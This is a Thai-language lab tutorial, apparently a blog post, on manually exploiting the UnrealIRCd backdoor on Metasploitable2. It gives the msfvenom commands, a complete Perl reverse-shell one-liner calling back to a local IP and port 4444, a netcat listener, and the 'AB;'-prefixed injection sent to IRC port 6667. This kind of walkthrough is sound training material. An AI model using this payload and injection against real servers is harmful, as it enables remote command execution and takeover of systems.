How to exploit the UnrealIRCD manually (Backdoor Command Execution) – Metasploitable2

บทนำ (Overview)

จากบทความที่แล้ว How to exploit the UnrealIRCD (Backdoor Command Execution) – Metasploitable2 ได้นำเสนอวิธี “Exploit” ช่องโหว่ “Backdoor” ของ “UnrealIRCD” โดยใช้ “Metasploit” มาในบทความนี้เราจะใช้วิธีการสร้าง Payload และใช้ “Netcat” ในการเชื่อมต่อจนได้ “Reverse shell” สำหรับควบคุมเครื่องระยะไกล

ขั้นตอน (Steps)

  1. ให้ตรวจสอบ “IP” เครื่องเราโดยใช้คำสั่ง
    ipconfig
    
  2. เมื่อพบแล้ว “inet 192.168.1.54” ให้ทำการสร้าง “Payload” สำหรับ “Reverse shell”
    คำสั่ง

    msfvenom -p cmd/unix/reverse_perl --payload-options
    

    ผลลัพธ์

    Basic options:
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    LHOST                   yes       The listen address
    LPORT  4444             yes       The listen port
    
  3. จากคำสั่งข้างต้นเราสามารถตรวจสอบได้ว่า “LHOST” จะต้องตั้งค่าก็คือ “IP” ของเครื่องเรานั้นเอง
    คำสั่ง

    msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.54
    

    ผลลัพธ์

    perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.1.54:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
    

    Metasploitable2-postgres-irc-03

  4. ให้ตั้ง “Listener” ตาม “Port” ที่ตั้งเอาไว้คือ “4444” โดยใช้ “Netcat”
    nc -nlvp 4444
    
  5. จากนั้นเปิดหน้า “command prompt” อีกอันแล้วเชื่อมต่อไปยัง “port” หมายเลข “6667”
    nc -nv 192.168.1.58 6667
    

    Metasploitable2-postgres-irc-04

  6. ที่นี้ให้ใช้งาน “payload” ที่เราสร้างมาแต่มีเงื่อนไขว่าให้ใส่ “AB;” นำหน้า
    AB;perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.1.54:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
    
  7. ตรวจสอบที่ “Listener” ที่ตั้งเอาไว้พบว่าจะได้ “Reverse shell” กลับมา Metasploitable2-postgres-irc-05

 

ใส่ความเห็น